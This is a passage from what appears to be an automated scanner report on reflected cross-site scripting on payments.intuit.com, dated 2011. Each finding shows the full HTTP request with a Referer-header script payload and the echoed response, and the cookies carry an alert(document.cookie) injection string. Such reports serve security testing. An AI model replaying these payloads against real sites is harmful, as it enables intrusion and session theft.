P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109460

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=3c927--><script>alert(1)</script>c31793869de | -->
...[SNIP]...

1.33. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 88c20--><script>alert(1)</script>924f3a86d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=88c20--><script>alert(1)</script>924f3a86d14

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rblhe1EyqVTlvVVwvVfbCg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9617F910A0805192AA117E356453B1F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145489

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=88c20--><script>alert(1)</script>924f3a86d14 | -->
...[SNIP]...

1.34. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8442e'-alert(1)-'9e35c41500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3N8dnzIcpHCCR4yazTOqzQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9616AE30A0805192AA117E35222B8A8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145455

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500';
                   </script>
...[SNIP]...

1.35. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 13789--><script>alert(1)</script>c6658a6c597 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13789--><script>alert(1)</script>c6658a6c597

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:20 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RHjF1WYshpdtziLMdwBPsw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:21 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FD8DC0A0805192AA117E3A718C091
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116417

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=13789--><script>alert(1)</script>c6658a6c597 | -->
...[SNIP]...

1.36. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51516'-alert(1)-'1ab853b004d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:01 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UrCbcswIPLaXgenjtn1JyA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:02 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F8FAC0A0805192AA117E3E1625670
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116386

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d';
                   </script>
...[SNIP]...

1.37. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 189b5'-alert(1)-'d3b08e9e2f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=nsY-E9JullWuK3Fo-MwMpA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96105730A0805192AA117E3D6C3D6DF
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116174

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1';
                   </script>
...[SNIP]...

1.38. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 18139--><script>alert(1)</script>e22e5c6761f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=18139--><script>alert(1)</script>e22e5c6761f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=iJGjLaqLPGZAre+7IVia6A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9612C450A0805192AA117E36B59CC68
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116206

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=18139--><script>alert(1)</script>e22e5c6761f | -->
...[SNIP]...

1.39. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f7c47--><script>alert(1)</script>3f78b487239 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=f7c47--><script>alert(1)</script>3f78b487239

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ACIQv+A9wNRqvY9FGWFs9A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9615C020A0805192AA117E3B4FD864C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140415

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=f7c47--><script>alert(1)</script>3f78b487239 | -->
...[SNIP]...

1.40. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fb1c'-alert(1)-'0a97bbe41af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

